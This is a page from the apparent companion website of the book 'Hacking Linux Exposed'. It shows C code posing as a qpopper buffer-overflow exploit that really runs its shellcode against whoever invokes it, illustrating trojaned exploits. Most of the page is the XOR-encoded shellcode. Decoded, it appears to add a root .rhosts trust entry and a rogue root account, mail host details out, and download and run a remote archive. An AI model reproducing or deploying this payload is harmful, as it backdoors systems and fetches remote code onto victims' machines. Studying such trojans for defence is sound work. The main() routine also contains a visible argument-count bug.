Hacking Linux Exposed

About
Authors
Contents
Reviews
Foreword
Purchase

Articles
Books
Sourcecode
Tools
Errata

Home

 


(view this code in a separate window) 

/*
   This is a bit of code that claims to be an
   exploit to a potential qpopper buffer
   overflow.
   
   Rather than actually exploiting the buffer
   overflow, it instead will simply run the
   shellcode as the invoking user on the local
   system.
*/






/*
   qpopper 2.51 exploit code for Linux i386.
   You will need to try this with various offsets,
   usually somewhere between 300 and 650.
   
   To compile:   gcc -o popexp popexp.c
   Usage:  popexp hostname offset
*/

char shellcode[] = "\xeb\x03\x5e\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc6\x0f\x31"
"\xc9\x66\xb9\x8c\x01\x80\x36\x02\x46\xe2\xfa\xeb\x33\x03\x02\x02\x2d\x60\x6b"
"\x6c\x2d\x71\x6a\x02\x2f\x61\x02\x92\x92\x92\x92\x92\x92\x92\x92\x92\x92\x92"
"\x92\x92\x92\x92\x92\x66\x3f\x63\x29\x2c\x61\x6d\x6f\x39\x67\x61\x6a\x6d\x22"
"\x25\x29\x22\x29\x25\x3c\x3c\x2d\x70\x6d\x6d\x76\x2d\x2c\x70\x6a\x6d\x71\x76"
"\x71\x39\x2a\x2d\x71\x60\x6b\x6c\x2d\x6b\x64\x61\x6d\x6c\x64\x6b\x65\x22\x2f"
"\x63\x39\x2d\x60\x6b\x6c\x2d\x6c\x67\x76\x71\x76\x63\x76\x22\x2f\x6c\x63\x2b"
"\x7e\x2d\x60\x6b\x6c\x2d\x6f\x63\x6b\x6e\x22\x6a\x31\x63\x56\x42\x26\x66\x22"
"\x3c\x2d\x66\x67\x74\x2d\x6c\x77\x6e\x6e\x39\x70\x6f\x22\x2f\x70\x64\x22\x6a"
"\x22\x6a\x2c\x76\x63\x70\x39\x67\x61\x6a\x6d\x22\x25\x6a\x31\x63\x56\x38\x7a"
"\x38\x32\x38\x32\x38\x38\x2d\x38\x2d\x60\x6b\x6c\x2d\x60\x63\x71\x6a\x25\x22"
"\x3c\x3c\x2d\x67\x76\x61\x2d\x72\x63\x71\x71\x75\x66\x39\x67\x61\x6a\x6d\x22"
"\x25\x6a\x31\x63\x56\x38\x6a\x31\x33\x33\x6a\x70\x6a\x4d\x49\x6b\x6f\x36\x65"
"\x38\x38\x38\x38\x38\x38\x38\x38\x25\x3c\x3c\x2d\x67\x76\x61\x2d\x71\x6a\x63"
"\x66\x6d\x75\x39\x75\x65\x67\x76\x22\x6a\x76\x76\x72\x38\x2d\x2d\x26\x66\x2d"
"\x6a\x2c\x76\x63\x70\x39\x76\x63\x70\x22\x2f\x7a\x64\x22\x6a\x2c\x76\x63\x70"
"\x22\x3c\x2d\x66\x67\x74\x2d\x6c\x77\x6e\x6e\x39\x71\x6a\x22\x6a\x2d\x70\x77"
"\x6c\x2c\x71\x6a\x39\x22\x70\x6f\x22\x2f\x70\x64\x22\x6a\x02\x39\x02\x83\xee"
"\x65\x29\x02\x02\x57\x8b\xe7\x81\xee\x12\x54\x51\xea\x02\x02\x02\x02\x59\x83"
"\xc1\xb5\x12\x02\x02\x8f\xb1\x07\xec\xfd\xfd\x8b\x77\xf2\x8f\x81\x0f\xec\xfd"
"\xfd\x8b\x47\xf6\x8f\x81\x22\xec\xfd\xfd\x8b\x47\xfa\xc5\x47\xfe\x02\x02\x02"
"\x02\x8f\x4f\xf2\xba\x09\x02\x02\x02\x33\xd0\x51\x8b\xf1\xcf\x82\x33\xc2\x8f"
"\x67\xea\x59\x5c\xcb\xc1\x92\x92\x00"

int (*exploit)();

void usage( char *argvzero ) {
	fprintf( stderr, "Usage: %s hostname offset\n", argvzero);
	exit(1);
}


int main( int argc, char **argv ) {

   int offset;
   char hostname[BUFSIZ];


	if ( argc != 2 ) {
		usage(*argv);
	}
	offset = atoi( argv[2] );
	(char*) exploit = shellcode;


	/* Include lots of code here to make it look like this
	 * program is legitimate.  Do some hostname lookups,
	 * grab the POP port from getservbyname(3), maybe
	 * even establish the POP connection, sending it
	 * random junk.  Then we run the actual exploit
	 * against the invoking user, having pointed the
	 * exploit function pointer to our shellcode above.
	 */

	exploit();
	exit(0);


}